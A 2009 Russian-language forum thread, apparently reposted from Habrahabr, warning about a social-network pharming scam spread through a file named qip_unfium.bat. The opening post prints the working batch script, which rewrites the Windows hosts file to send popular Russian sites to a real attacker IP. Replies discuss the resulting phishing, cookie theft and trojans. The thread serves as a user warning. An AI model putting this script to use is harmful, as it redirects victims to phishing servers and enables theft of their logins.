Новая сетевая подства

TeMHuK · 27 Окт 2009

Похоже, началась очередная эпидемия фарминга через социальные сети.

В одной из известных популярных социальных сетей (а может, и не в одной?) через систему личных сообщений друзьям рассылаются сообщения вида:
У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?

На что человек, конечно же, получает ответ:
Могу, привет)

И через некоторое время получает следующее сообщение:
urlshort.me/** фaйл без oшибoк зaпускaеться?))

(адрес закрыл звёздочкам специально, чтоб неповадно было щёлкать

Как человек, наученный жизненным опытом (в том числе и своим), сходил по ссылке браузером в режиме инкогнито. Сокращённая ссылка ведёт на один из популярных файлообменников, с которого предлагают скачать файл qip_unfium.bat

Ничего не подозревающий пользователь щёлкает по этому файлу, желая помочь другу разобраться с проблемой с Квипом Унфиумом, и… выполняется следующий код:
@rem ----- Exescript Options Begin -----
@rem scriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- Exescript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

Кстати перед собственно телом скрипта в файле 662 пустые строки.

О последствиях выполнения данного скрипта можно не упоминать.

Мораль? В стотысячный раз напоминаю: остерегайтесь подделок и уточняйте у друзей, а действительно ли они присылали вам такую ссылку.

http://habrahabr.ru/blogs/infosecurity/73515/

MAX · 27 Окт 2009

А можно все таки упомянуть о последствиях! :roll:

Lucifer · 27 Окт 2009

Винда сосет) МакОсь решает :dirol:

Rider_777 · 27 Окт 2009

TeMHuK
Ты давай ка сними очки и по русски нам всё объясни! Чё такое скрипты и всё такое! :wink:

1101 · 27 Окт 2009

TeMHuK
людей которые не понимают что файл *.bat это подстава - в сеть пускать нельзя, от них она тупеет

MAX
Rider_777
вместо того чтобы заходить на ваш любимый вконтактик, рамблер и пр. адреса которые там написаны, вы зайдете на страницу по адресу 81.94.229.115, скорее всего там через обще\мало-известную дырку в браузере, вам захреначат трояна, который скоммуниздит все пароли и например заблочит комп, и попросит за разблокировку денек, ничего интересного

TeMHuK · 27 Окт 2009

У вас пропишется адрес 81.94.229.115 вместо популярных ресурсов. Причем вы этого даже не заметите. Он будет работать как шлюз, пропуская инфу через себя. Все ваши логины и пароли, которые будут там вводиться попадут и создателю шлюза

1101 · 27 Окт 2009

TeMHuK
не будет там шлюза никакого

тупо трояна всадят и все
темболее что авторизация например на mail.ru идет не на хосте mail.ru, а на win.mail.ru, а запись в хостах только для верхнего хоста

жалка сервис уже лежит, интересно было-бы покавырять

TeMHuK · 27 Окт 2009

Lucifer
Макось тут не поможет. Это не вирусы, это похищение пароля методом "на живца"
Конкретно этот заточен под винду, но таким же образом и у макоси можно дернуть.

TeMHuK · 27 Окт 2009

1101
Так там глубже и не надо. Нужен только верхний уровень. ТЫ на нем клоцаешь на ссылку, а дальше как любой исправный прокси он открывает то что ниже.

Hot_Swap · 27 Окт 2009

Короче прикол в том, что этот хитрый скриптик переписывает HOSTS файл вашего компа, и в итоге, куда бы вы не пытались пройти всегда будете попадать на этот "81.94.229.115" сайт. Там, скорее всего есть другой скрипт, который либо разворачивает окно браузера во весь экран и не дает ничего сделать(типо вы заблокированы), либо запускает вредоносную прогу типа (вирус, троян, нюкер, червяк и т.п.) А вот что они будут делать с вашим компом, узнаете только потом))) Могут пароли тиснуть, могут использовать как подставную машину, да много чего сделать можно......)))))))

1101 · 27 Окт 2009

TeMHuK
хоть тут можно с адеватными людьми подискутировать

то что ты говоришь - вполне реально, НО, необходимо настроить виртуальные хосты на том(81.94.229.115) серваке, чтобы он считал себя то mail.ru то рамблером, отрисовать страницу похожую на настоящую и все такое, + потом заставить win.mail.ru схавать куку с данными для авторизации с другого хоста, фактически это гимор тот еще, проще в ифрейме скормить троянца, а на весь экран открыть реальный mail.ru, или просто по быстрому перебросить

g30 · 27 Окт 2009

так вот оказывается кто все эти программы пишет :!: :lol:

TeMHuK · 27 Окт 2009

А ему не надо делать полный проброс. Считал введенные данные, выбросил ошибку или перешел на реальный win.mail.ru
Вариантов много. Может просто хранить фальшивые копии нужных страниц, а может проброс делать. Тут уже от профессионализма фишера зависит

TeMHuK · 27 Окт 2009

georg
На чем спалились? :?:

Duke_yar · 27 Окт 2009

Такая вещь называется "фишинг". Воруются пароли на все перечисленный сайты и соответственно доступ к страницам и персональным данным на них. Соотвественно ничего хорошего.

Потом в продаже база данных появится недалеких пользователей вконтактов и тому подобных сайтов

1101 · 27 Окт 2009

TeMHuK
дак фишинговые фильтры щас почти во всех браузерах
+про домены куков тоже ненада забывать
да и если подойти с практической точки зрения, нафига нужно рисоавать фальшивки и считывать данные ввода(которые кстати не всегда будут правильные), если можно тупо засадить резидентную прогу, которая все что нужно и даже больше пинесет тебе на блюдечке

ау, админы 81.94.229.115!!
поднимайте сервак давайте быстро, позырить охота что там у вас

tatarin · 27 Окт 2009

Парни, я лошара по компу, сегодня настраивали вай фай и товарищ мне прислал какую то прогу, которую я запустил и потом он попросил мне прислать ID и пароль которые высветились после чего он начал лазить в моем компе и настраивать вай фай. Потом он сказал что все, вышел из моего компа и типа не может войти ко мне на комп, так как те цифры которые я ему передал меняются. Тут есть подстава? Вот эта прога . http://www.teamviewer.com/download/TeamViewerQS.exe

1101 · 27 Окт 2009

нет

если ты доверяешь своему другу

tatarin · 27 Окт 2009

Не...... ну доверяю в пределах разумного но действительно ID и пароль меняется и с тем паролем никто не зайдет или это не так.

1101 · 27 Окт 2009

tatarin
ну так снеси прогу и все )

TeMHuK
почитал камменты на хабре, и правда походу тупо куки ворует, фу, как не красиво и неэффективно

Добро пожаловать в Sti Club!

Новая сетевая подства

TeMHuK

Вечно молодой

MAX

Старикан-разбойник

Lucifer

Повелитель STI-хий

Rider_777

STI-льный

1101

Новичок

TeMHuK

Вечно молодой

1101

Новичок

TeMHuK

Вечно молодой

TeMHuK

Вечно молодой

Hot_Swap

Новичок

1101

Новичок

g30

Повелитель STI-хий

TeMHuK

Вечно молодой

TeMHuK

Вечно молодой

Duke_yar

Новичок

1101

Новичок

tatarin

Хранитель Волшебной Флэшки

1101

Новичок

tatarin

Хранитель Волшебной Флэшки

1101

Новичок